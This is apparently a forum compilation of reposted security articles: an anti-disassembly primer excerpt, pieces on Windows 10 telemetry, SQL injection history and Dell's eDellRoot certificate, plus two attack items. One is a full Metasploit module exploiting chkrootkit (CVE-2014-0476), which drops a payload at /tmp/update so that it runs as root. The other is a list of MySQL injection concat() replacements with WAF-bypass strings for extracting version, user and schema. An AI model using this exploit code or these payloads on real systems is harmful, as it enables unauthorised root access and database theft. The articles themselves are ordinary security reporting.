reference to an address. For example for the function call it would get the funciton stringname by the use of some weird bunch of decoding subroutine and save the value in an offset sub4211C1. This would make static analysis really hard since IDA won't recognize it easily. From a static analysis point of view though it dosen't seem to cause massive harm this coupled with other anti-disassembly techniques can lead to annoyance for an analyst. There are a couple more annoying techniques which I will explore in another post such as abusing the return pointer (for fun and profit:P ) ,using your own Structed Exception Handler (SEH) and screwing around with the stack-frame construction in IDA pro. Sursa: Anti-Disassembly techniques used by malware (a primer)

Microsoft Makes Windows 10 Automatic Spying Worse Microsoft MSFT +0.11% has been on a roll lately. Its massive Windows 10 update ‘Threshold 2’ has far more good features than bad ones, the ‘free upgrade’ rules have been improved and even Microsoft’s Black Friday 2015 dealsare surprisingly great. But a new discovery has been made which isn’t good news – at all… Earlier this month Microsoft finally went on record admitting that automatic spying within Windows 10 cannot be stopped. This sparked a lot of outrage and with ‘Threshold 2’ it appeared Microsoft had done a sharp U-turn because the background service at the heart tracking (the ‘Diagnostics Tracking Service’ aka ‘DiagTrack’) appeared to have been removed. Critics celebrated and it was another well deserved pat on the back for Microsoft. Except it turns out Microsoft had just been very sneaky. What Tweakhound discovered and was subsequentlyconfirmed by BetaNews, is Microsoft simply renamed DiagTrack. It is now called the ‘Connected User Experiences and Telemetry Service’ – which is both a) deliberately vague, and misleading (don’t ‘Connected User Experiences’ sound great). Windows 10 prior to the Threshold 2 update shows ‘Diagnostics Tracking Service’. Image credit: Tweakhound Even sneakier is, in being renamed, Microsoft also reset users preferences. Those who dug deep into the Windows 10 registry to disable DiagTrack will find it has been re-enabled now it is called the Connected User Experiences and Telemetry Service. Yes, tracking is back and without any warning and your preferences were irrelevant. The good news is you can disable the Connected User Experiences and Telemetry Service the same way as DiagTrack: Hold down the Windows key and tap the R key In the box that opens type ‘services.msc’ and press the Enter key In the ‘Services (Local)’ section locate ‘Connected User Experiences and Telemetry’ and double-click it In the ‘Service status’ section click ‘Stop’ Under the ‘Startup type’ drop down menu select ‘Disabled’ and then confirm this and close the window by clicking ‘OK’ Note: it is advisable to disable Not delete the service. Deleting it can cause problems Windows 10 prior to the Threshold 2 update shows ‘Connected User Experiences And Telemetry’ which executes the exact same service as DiagTrack. Image credit: Tweakhound So what is Microsoft thinking here? I’ve reached out to the company but, despite recognising my enquiry, it has yet to issue a statement. I’ll update this post when it does. While Microsoft thinks about what to say, I’d say the problem with the DiagTrack rebrand is the company wasn’t thinking. Subtle under the hood changes will always be picked up for such a high profile product. That said such a move is consistent with the negatives in Threshold 2 namely: it resets many user preferences (including basics like your preferred web browser) if they weren’t Microsoft product/services as well as silently deleting third party system monitoring apps like: CPU-Z, speccy, 8gadgetpack, SpyBot, HWMonitor and more. In my opinion it is this kind of overriding desire for control and a disregard for user choices which is harming Windows 10. At its core Windows 10 is a modern and highly capable platform, but it has been buried under ludicrous layers of control. Worst still it has created a two tier customer base where consumers are forced to take updates which businesses can delay, effectively turning everyday users into bug testers for corporations. It all feels unsavoury and unnecessary and (while it could be coincidence) there has been a -users-reluctant-to-switch/'>dramatic slowdown in Windows 10 growth after an explosive beginning. For the first ever Free version of Windows, that’s not great. How can Microsoft reignite the love for Windows 10? I’d say a good start would be to stop doing daft things like this… Sursa: http://www.forbes.com/sites/gordonkelly/2015/11/24/windows-10-automatic-spying-begins-again/

HTTPS e ok (depinde si de tine). HTTP nu e ok. Tor Browser e ok (depinde si de tine). Mozilla cu proxy Tor nu e ok. https://hackertarget.com/tor-exit-node-visualization/

[h=1]Chkrootkit Local Privilege Escalation[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. Rank = ManualRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Chkrootkit Local Privilege Escalation', 'Description' => %q{ Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default. }, 'Author' => [ 'Thomas Stangner', # Original exploit 'Julien "jvoisin" Voisin' # Metasploit module ], 'References' => [ ['CVE', '2014-0476'], ['OSVDB', '107710'], ['EDB', '33899'], ['BID', '67813'], ['CWE', '20'], ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] ], 'DisclosureDate' => 'Jun 04 2014', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'SessionTypes' => ['shell', 'meterpreter'], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Passive, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h )) register_options([ OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) ]) end def check version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") if version =~ /chkrootkit version 0\.[1-4]/ Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_warning('Rooting depends on the crontab (this could take a while)') write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") cmd_exec('chmod +x /tmp/update') register_file_for_cleanup('/tmp/update') print_status('Payload written to /tmp/update') print_status('Waiting for chkrootkit to run via cron...') end end Sursa: https://www.exploit-db.com/exploits/38775/

WRITTEN BY JOSEPH COX November 20, 2015 // 08:00 AM EST One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerabilitydiscovered two years before he was even born. That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees,grab data from the Wall Street Journal, and hit the sites of US federal agencies. “It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.” But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around? SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security. “According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.” SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote. In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.” Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at thenumber one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation,a non-profit that monitors the threats that websites face. Phrack's current logo. Image: Phrack “SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview. “When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.” But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data. An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said. Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, asecurity researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap. “It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added. When the attacker is looking for a target to hit in the first place, that's just as simple to automate too. Image: sqlmap “They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.” “You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input. If the solutions are fairly straight forward, why are SQLi-based attacks still happening? “The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email. Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it. So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening? “Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.” Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attacks, despite them being relatively straight forward to implement. Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said. So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.Ultimately, the responsibility of the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer. Sursa: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away

Superfish 2.0: Dangerous Certificate on Dell Laptops breaks encrypted HTTPS Connections tl;dr Dell laptops come preinstalled with a root certificate and a corresponding private key. That completely compromises the security of encrypted HTTPS connections. I've provided an online check, affected users should delete the certificate. It seems that Dell hasn't learned anything from the Superfish-scandal earlier this year: Laptops from the company come with a preinstalled root certificate that will be accepted by browsers. The private key is also installed on the system and has been published now. Therefore attackers can use Man in the Middle attacks against Dell users to show them manipulated HTTPS webpages or read their encrypted data. The certificate, which is installed in the system's certificate store under the name "eDellRoot", gets installed by a software called Dell Foundation Services. This software is still available on Dell's webpage. According to the somewhat unclear description from Dell it is used to provide "foundational services facilitating customer serviceability, messaging and support functions". The private key of this certificate is marked as non-exportable in the Windows certificate store. However this provides no real protection, there are Tools to export such non-exportable certificate keys. A user of the plattform Reddit has posted the Key there. For users of the affected Laptops this is a severe security risk. Every attacker can use this root certificate to create valid certificates for arbitrary web pages. Even HTTP Public Key Pinning (HPKP) does not protect against such attacks, because browser vendors allow locally installed certificates to override the key pinning protection. This is a compromise in the implementation that allows the operation of so-called TLS interception proxies. I was made aware of this issue a while ago by Kristof Mattei. We asked Dell for a statement two weeks ago and didn't get any answer. It is currently unclear which purpose this certificate served. However it seems unliklely that it was placed there deliberately for surveillance purposes. In that case Dell wouldn't have installed the private key on the system. Affected are only users that use browsers or other applications that use the system's certificate store. Among the common Windows browsers this affects the Internet Explorer, Edge and Chrome. Not affected are Firefox-users, Mozilla's browser has its own certificate store. Users of Dell laptops can check if they are affected with an online check tool. Affected users should immediately remove the certificate in the Windows certificate manager. The certificate manager can be started by clicking "Start" and typing in "certmgr.msc". The "eDellRoot" certificate can be found under "Trusted Root Certificate Authorities". This incident is almost identical with the Superfish-incident. Earlier this year it became public that Lenovo had preinstalled a software called Superfish on its Laptops. Superfish intercepts HTTPS-connections to inject ads. It used a root certificate for that and the corresponding private key was part of the software. After that incident several other programs with the same vulnerability were identified, they all used a software module called Komodia. Similar vulnerabilities were found in other software products, for example in Privdog and in the ad blocker Adguard. This article is mostly a translation of a German article I wrote for Golem.de. Image source and license: Wistula / Wikimedia Commons, Creative Commons by 3.0 Sursa: https://blog.hboeck.de/archives/876-Superfish-2.0-Dangerous-Certificate-on-Dell-Laptops-breaks-encrypted-HTTPS-Connections.html

mysql injection concat() replacements @sergey_lakantar select export_set(1,version(),user(),' : ',2); 5.1.7 : my_user select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2); 5.1.7 : my_user : my_db select make_set(7,version(),user(),schema()); 5.1.7,my_user,my_db select replace(make_set(7,version(),user(),schema()),',',' : '); 5.1.7 : my_user : my_db select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : '); 5.1.7 : my_user select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : '); 5.1.7 : my_user : my_db select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user()); 5.1.7 : my_user select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema()); 5.1.7 : my_user : my_db select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version()) 5.1.7 : my_user select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version()); 5.1.7 : my_user : my_db select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()); 5.1.7 : my_user select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema()); 5.1.7 : my_user : my_db group_concat() without comma- select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x); 5.1.7 : my_user : my_db concat() waf bypass- /*!50000group_coNcat(*/) /*!50000coNcat(*/) `coNcat`%0a%0b%0c%0d%a0() {snoopdogg concat()} {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}} {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}} concat-- a%0a() concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a) concat/**x**/() Modsecurity- concat+() Link: concat() replacements - Pastebin.com